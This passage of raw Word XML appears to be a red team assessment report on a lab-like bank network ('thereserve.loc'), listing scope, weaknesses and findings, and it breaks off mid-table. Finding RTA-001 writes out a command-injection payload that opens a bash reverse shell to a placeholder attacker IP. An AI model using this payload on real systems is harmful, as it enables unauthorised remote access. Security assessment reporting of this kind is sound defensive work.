        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2195C95C" w14:textId="52DEFE61" w:rsidR="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
            <w:r>
              <w:t>10.200.119.x/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A5A9D2D" w14:textId="6CABC85F" w:rsidR="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
            <w:r>
              <w:t>Red Team Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A04586" w14:paraId="73168C3C" w14:textId="77777777" w:rsidTr="00A04586">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1965E499" w14:textId="38331D8D" w:rsidR="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
            <w:r>
              <w:t>External IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74FF6E89" w14:textId="7DA8D223" w:rsidR="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
            <w:r>
              <w:t>10.200.119.11,10.200.119.12,10.200.119.13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06407D60" w14:textId="6DC1BA06" w:rsidR="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
            <w:r>
              <w:t>Red Team Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60F3FDA9" w14:textId="77777777" w:rsidR="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586"/>
    <w:p w14:paraId="686025BC" w14:textId="6122BFBF" w:rsidR="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc136520521"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Client Exclusions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="13A086D9" w14:textId="47AFF3B9" w:rsidR="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:r>
        <w:t>As per the client’s (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Trimento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Reserve Bank)</w:t>
      </w:r>
      <w:r w:rsidR="00C263C5">
        <w:t xml:space="preserve"> request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, RT4U did not engage in any DoS or DDoS inducing activities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FADD49" w14:textId="2A137659" w:rsidR="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:r>
        <w:t xml:space="preserve">As per RT4U’s </w:t>
      </w:r>
      <w:r w:rsidR="00C263C5">
        <w:t>request, its assessment team did not engage in any Phishing or Social Engineering attack paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79422603" w14:textId="58AD15A7" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc136520522"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Client Allowances</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="6341B19C" w14:textId="4B6EB566" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:r>
        <w:t>The client made no allowances to RT4U.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240322B7" w14:textId="46AE06E4" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc136520523"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6B7B9DEB" w14:textId="08CDEC72" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:r>
        <w:t>The Red Team assessment took place between the dates 28</w:t>
      </w:r>
      <w:r w:rsidRPr="00C263C5">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> May, 2023 to 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C263C5">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> June, 2023. The following sections explain what steps were taken to not only achieve a full enterprise compromise but also any steps taken to complete the goal of unauthorised transfer on their internal banking system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6428212E" w14:textId="77777777" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5"/>
    <w:p w14:paraId="473D89E5" w14:textId="57ED6BCF" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc136520524"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Client Strengths</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="00A8FC94" w14:textId="6E29BD79" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:r>
        <w:t>Below is a list of strengths that the RT4U team found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EE6CFE" w14:textId="6D01B820" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Service Accounts were not running as Local/Domain Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DA3A7E" w14:textId="315E896E" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Detected on Some Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F3F77F" w14:textId="34C3E85E" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Local Admin Account Password were different on some devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190DB36D" w14:textId="594CF8D8" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Rule of Least Privilege located on some devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F13DBEA" w14:textId="46C2DE82" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc136520525"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Client Weaknesses</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="51BFC7EF" w14:textId="48B77E67" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:r>
        <w:t>Below is a list of weaknesses that the RT4U team found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC69794" w14:textId="48BED281" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Remote Code execution on the VPN Server (10.200.119.12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697543F7" w14:textId="4F415B1B" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Password Policy was ineffective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55302EA9" w14:textId="6CC50E6B" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>S-I-D History Attacks were do-able</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2945B968" w14:textId="179D3ABC" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Password Reuse on Some Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6867C264" w14:textId="77777777" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5"/>
    <w:p w14:paraId="6920C238" w14:textId="1C045E26" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc136520526"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability Overview and Report Card</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16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63C5" w14:paraId="1E5E8D3D" w14:textId="77777777" w:rsidTr="00C263C5">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1803" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DB56A08" w14:textId="398AB88F" w:rsidR="00C263C5" w:rsidRDefault="00AB77C1" w:rsidP="00C263C5">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1803" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43B1921E" w14:textId="6B4D6CAD" w:rsidR="00C263C5" w:rsidRDefault="00AB77C1" w:rsidP="00C263C5">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1803" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E3F613E" w14:textId="442BB865" w:rsidR="00C263C5" w:rsidRDefault="00AB77C1" w:rsidP="00C263C5">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1803" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="308240EB" w14:textId="70B70D6B" w:rsidR="00C263C5" w:rsidRDefault="00AB77C1" w:rsidP="00C263C5">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1804" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10015675" w14:textId="68EB54C3" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C263C5" w14:paraId="5964C974" w14:textId="77777777" w:rsidTr="00C263C5">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1803" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C5D229F" w14:textId="0AF41FDE" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
            <w:r>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1803" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C05EFDA" w14:textId="23DA2000" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1803" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ACF399D" w14:textId="19BFC498" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1803" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AE21772" w14:textId="093BD05C" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1804" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EAA6155" w14:textId="7FD6A7AB" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5">
            <w:r>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06DFF799" w14:textId="77777777" w:rsidR="00C263C5" w:rsidRDefault="00C263C5" w:rsidP="00C263C5"/>
    <w:p w14:paraId="1D9F109C" w14:textId="2956FC6F" w:rsidR="00AB77C1" w:rsidRDefault="00AB77C1" w:rsidP="00AB77C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc136520527"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Finding RTA-001: Remote Code Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0F0FFFE1" w14:textId="69A50AB7" w:rsidR="00AB77C1" w:rsidRDefault="00AB77C1" w:rsidP="00AB77C1">
      <w:r>
        <w:t xml:space="preserve">Poor configuration meant after the compromise of one user within the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>corpdc.thereserve.loc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> domain resulted in access to the user panel of the VPN Server located at (10.200.119.12)</w:t>
      </w:r>
      <w:r w:rsidR="006B181A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E66079" w14:textId="1FE1FD3C" w:rsidR="006B181A" w:rsidRDefault="006B181A" w:rsidP="00AB77C1">
      <w:r>
        <w:t>This was vulnerable to command injection via Burp Suite Community Edition. The vulnerability lied within the variable ‘filename’ which was being requested by ‘/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requestvpn.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’. If an adversary swapped what was following the variable name and before the HTTP header with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52932642" w14:textId="77777777" w:rsidR="006B181A" w:rsidRDefault="006B181A" w:rsidP="00AB77C1"/>
    <w:p w14:paraId="25B77B3A" w14:textId="320D006A" w:rsidR="006B181A" w:rsidRDefault="006B181A" w:rsidP="00AB77C1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“Test &amp;&amp; bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AttackIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]/[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AttackPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">] 0&gt;&amp;1” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F06D75" w14:textId="4657EFFE" w:rsidR="006B181A" w:rsidRDefault="006B181A" w:rsidP="00AB77C1">
      <w:r>
        <w:t xml:space="preserve">And </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> encoded it, this would result in a reverse being popped and remote code execution to easily begin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C1158" w14:textId="5B487392" w:rsidR="006B181A" w:rsidRDefault="006B181A" w:rsidP="00AB77C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33DFF582" wp14:editId="7425700C">
            <wp:extent cx="4657725" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="12253421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42117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7F5B" w14:textId="062940DC" w:rsidR="006B181A" w:rsidRPr="00AB77C1" w:rsidRDefault="006B181A" w:rsidP="00AB77C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21A54EDB" wp14:editId="7632830A">
            <wp:extent cx="5731510" cy="2391410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="7035568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568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E7EF" w14:textId="161BD0F3" w:rsidR="00AB77C1" w:rsidRDefault="00AB77C1" w:rsidP="00AB77C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc136520528"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Finding RTA-00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Weak User Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="689A24DE" w14:textId="5AF435FC" w:rsidR="006B181A" w:rsidRPr="006B181A" w:rsidRDefault="006B181A" w:rsidP="006B181A">
      <w:r>
        <w:t>RT4U detected multiple users with poor credential security. These credentials can be located</w:t>
      </w:r>
      <w:r w:rsidR="005F69E5">
        <w:t xml:space="preserve"> within /vulnerabilities.xlsx under the credentials section of the spreadsheet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4DC46B" w14:textId="3870E2A9" w:rsidR="00AB77C1" w:rsidRDefault="00AB77C1" w:rsidP="00AB77C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc136520529"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Finding RTA-00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Weak Service Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="3A04038A" w14:textId="16900877" w:rsidR="005F69E5" w:rsidRPr="006B181A" w:rsidRDefault="005F69E5" w:rsidP="005F69E5">
      <w:r>
        <w:t xml:space="preserve">RT4U detected multiple </w:t>
      </w:r>
      <w:r>
        <w:t>service accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with poor credential security. These credentials can be located within /vulnerabilities.xlsx under the credentials section of the spreadsheet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A8E5B" w14:textId="77777777" w:rsidR="005F69E5" w:rsidRPr="005F69E5" w:rsidRDefault="005F69E5" w:rsidP="005F69E5"/>
    <w:p w14:paraId="5DB43CD1" w14:textId="29FBABB0" w:rsidR="00AB77C1" w:rsidRDefault="00AB77C1" w:rsidP="00AB77C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc136520530"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Finding RTA-00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Easily Accessed Hashes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="036CC6B4" w14:textId="318F8284" w:rsidR="005F69E5" w:rsidRPr="006B181A" w:rsidRDefault="005F69E5" w:rsidP="005F69E5">
      <w:r>
        <w:t xml:space="preserve">RT4U detected multiple users with </w:t>
      </w:r>
      <w:r>
        <w:t>easily accessed hashes</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This allowed RT4U to not only privilege escalate to domain admin of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>corp.thereserve.loc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> but also escalate via golden tickets along with RTA-005 to obtain full enterprise compromise.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> These credentials can be located within /vulnerabilities.xlsx under the </w:t>
      </w:r>
      <w:r>
        <w:t>hashes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> section of the spreadsheet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D1E5E2" w14:textId="77777777" w:rsidR="005F69E5" w:rsidRPr="005F69E5" w:rsidRDefault="005F69E5" w:rsidP="005F69E5"/>
    <w:p w14:paraId="36F65901" w14:textId="166D0DCC" w:rsidR="00AB77C1" w:rsidRDefault="00AB77C1" w:rsidP="00AB77C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc136520531"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Finding RTA-00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S-I-D History</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="06526764" w14:textId="6D661F08" w:rsidR="00AB77C1" w:rsidRDefault="005F69E5" w:rsidP="00AB77C1">
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, RT4U was able to access the S-I-D for the following users/Groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7469A3BA" w14:textId="7D80ED16" w:rsidR="005F69E5" w:rsidRDefault="005F69E5" w:rsidP="005F69E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enterprise Admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75642759" w14:textId="38D09087" w:rsidR="005F69E5" w:rsidRDefault="005F69E5" w:rsidP="005F69E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Domain Admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C8026" w14:textId="12CCA716" w:rsidR="005F69E5" w:rsidRDefault="005F69E5" w:rsidP="005F69E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password hash for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kgbrt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38C78D6C" w14:textId="3F10CE32" w:rsidR="00AB77C1" w:rsidRDefault="00AB77C1" w:rsidP="00AB77C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc136520532"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Finding RTA-006: Path to Enterp</w:t>
      </w:r>
      <w:r w:rsidR="00BE0BDD"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</w:rPr>
        <w:t>ise Admin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0BDD" w14:paraId="19ADD656" w14:textId="77777777" w:rsidTr="00BE0BDD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D1A14EF" w14:textId="6ECE7628" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t>Step Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CA20A16" w14:textId="01FBEF1E" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F69D218" w14:textId="4F12787F" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t>Remediation</w:t>
            </w:r>
